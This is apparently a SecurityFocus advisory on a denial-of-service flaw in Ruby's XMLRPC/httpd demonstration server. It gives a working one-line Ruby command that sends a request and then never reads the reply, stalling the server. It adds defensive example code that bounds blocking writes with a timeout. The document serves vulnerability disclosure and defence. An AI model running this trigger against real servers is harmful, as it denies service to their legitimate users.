Yukihiro Matsumoto Ruby XMLRPC Server Denial of Service Vulnerability

Attackers exploit this issue with standard network utilities.

The following Ruby command will issue a request sufficient to trigger this issue:

ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'

This has been demonstrated against the 'httpd.rb' demonstration server shipped with Ruby: place a 100k file named 'z' in the demonstration server's document root, run the Ruby command above, and further requests to the server will be denied.
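The command above sends one request and then sleeps without ever reading the reply, so a server that hands the 100k file to a blocking write stays stuck on that single connection until the client goes away. The following added example (not the advisory's or Ruby's own code; `write_with_timeout`, `serve_one` and `demo_stuck_client` are hypothetical names) shows the defensive counterpart: a bounded write that abandons a client which stops draining its socket, reproduced on loopback with the same request.

```ruby
require "socket"

# Hypothetical helper (added here, not from the advisory or Ruby's httpd.rb):
# write `data` to `sock`, giving up once the peer has stopped draining it
# for `timeout` seconds. Returns the number of bytes handed to the kernel.
def write_with_timeout(sock, data, timeout)
  sent = 0
  while sent < data.bytesize
    begin
      sent += sock.write_nonblock(data.byteslice(sent, 65_536))
    rescue IO::WaitWritable
      # Socket send buffer is full: wait for it to drain, or give up.
      return sent unless IO.select(nil, [sock], nil, timeout)
    end
  end
  sent
end

# Serve a single request. A plain blocking `client.write(body)` here would
# block until the peer reads, which is how one sleeping client can stall
# a single-threaded server; the bounded write lets the server move on.
def serve_one(server, body, timeout)
  client = server.accept
  begin
    # Small send buffer so the demo blocks quickly and deterministically.
    client.setsockopt(Socket::SOL_SOCKET, Socket::SO_SNDBUF, 64 * 1024)
    loop { break if client.gets.to_s.chomp.empty? } # skip request line + headers
    header = "HTTP/1.0 200 OK\r\nContent-Length: #{body.bytesize}\r\n\r\n"
    write_with_timeout(client, header + body, timeout)
  ensure
    client.close
  end
end

# Reproduce the advisory's scenario on loopback: a client sends "GET /z" and
# then never reads. With the bounded write the server returns within
# roughly `timeout` seconds instead of hanging on that connection.
def demo_stuck_client(body_size: 8 * 1024 * 1024, timeout: 0.5)
  server = TCPServer.new("127.0.0.1", 0)
  stuck = TCPSocket.new("127.0.0.1", server.addr[1])
  stuck.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, 64 * 1024)
  stuck.print "GET /z HTTP/1.0\r\n\r\n" # same request as above, then no reads
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  sent = serve_one(server, "A" * body_size, timeout)
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
  stuck.close
  server.close
  { sent: sent, total: body_size, elapsed: elapsed }
end
```

The returned hash shows far fewer bytes sent than the body size and an elapsed time close to the timeout, i.e. the server gave up on the stuck client rather than waiting on it.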

Copyright 2010, SecurityFocus